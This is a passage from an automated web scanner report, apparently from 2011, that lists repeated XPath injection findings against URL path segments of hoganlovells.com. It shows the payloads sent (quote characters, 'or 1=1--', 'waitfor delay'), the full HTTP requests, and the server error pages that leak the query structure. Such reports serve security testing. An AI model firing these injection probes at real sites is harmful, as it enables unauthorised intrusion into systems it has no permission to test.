[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia')waitfor%20delay'0:0:20'--/awardsrankings']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.11. http://www.hoganlovells.com/newsmedia/awardsrankings [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/awardsrankings' HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:11 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.12. http://www.hoganlovells.com/newsmedia/awardsrankings/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 92224765'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia92224765'%20or%201%3d1--%20/awardsrankings/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8180
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia92224765'%20or%201=1--%20/awardsrankings']' has an invalid token.</title>
<style>
body {font-f
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia92224765'%20or%201=1--%20/awardsrankings']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia92224765'%20or%201=1--%20/awardsrankings']' has an invalid token.]
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5070035
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput) +19
MS.Inter
...[SNIP]...

2.13. http://www.hoganlovells.com/newsmedia/awardsrankings/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/awardsrankings'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:16 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6693
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/awardsrankings'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/awardsrankings'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/awardsrankings'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.14. http://www.hoganlovells.com/newsmedia/fastfacts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/fastfacts/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:56:15 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.15. http://www.hoganlovells.com/newsmedia/fastfacts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload '%20and%201%3d1--%20 was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/fastfacts'%20and%201%3d1--%20/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:56:18 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8120
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/fastfacts'%20and%201=1--%20']' has an invalid token.</title>
<style>
body {font-family:"Verda
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/fastfacts'%20and%201=1--%20']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/fastfacts'%20and%201=1--%20']' has an invalid token.]
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5070035
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput) +19
MS.Inter
...[SNIP]...

2.16. http://www.hoganlovells.com/newsmedia/newspubs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'waitfor%20delay'0%3a0%3a20'--/newspubs HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:06:01 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6663
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.</title>
<style>
body {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.17. http://www.hoganlovells.com/newsmedia/newspubs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs%2527 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:06:29 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.18. http://www.hoganlovells.com/newsmedia/newspubs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'waitfor%20delay'0%3a0%3a20'--/newspubs/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:40 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6663
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.</title>
<style>
body {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia'waitfor%20delay'0:0:20'--/newspubs']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.19. http://www.hoganlovells.com/newsmedia/newspubs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:54 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6663
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/newspubs'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/newspubs'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/newspubs'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.20. http://www.hoganlovells.com/newsmedia/newspubs/List [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/newspubs/List HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:10 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8252
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.21. http://www.hoganlovells.com/newsmedia/newspubs/List [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs%2527/List HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.22. http://www.hoganlovells.com/newsmedia/newspubs/List [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs/List%2527 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:37 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.23. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/newspubs/List.aspx HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.24. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/detail.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/newspubs/detail.aspx HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:55:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.25. http://www.hoganlovells.com/newsmedia/timeline/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/timeline/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:57:47 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.26. http://www.hoganlovells.com/newsmedia/timeline/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

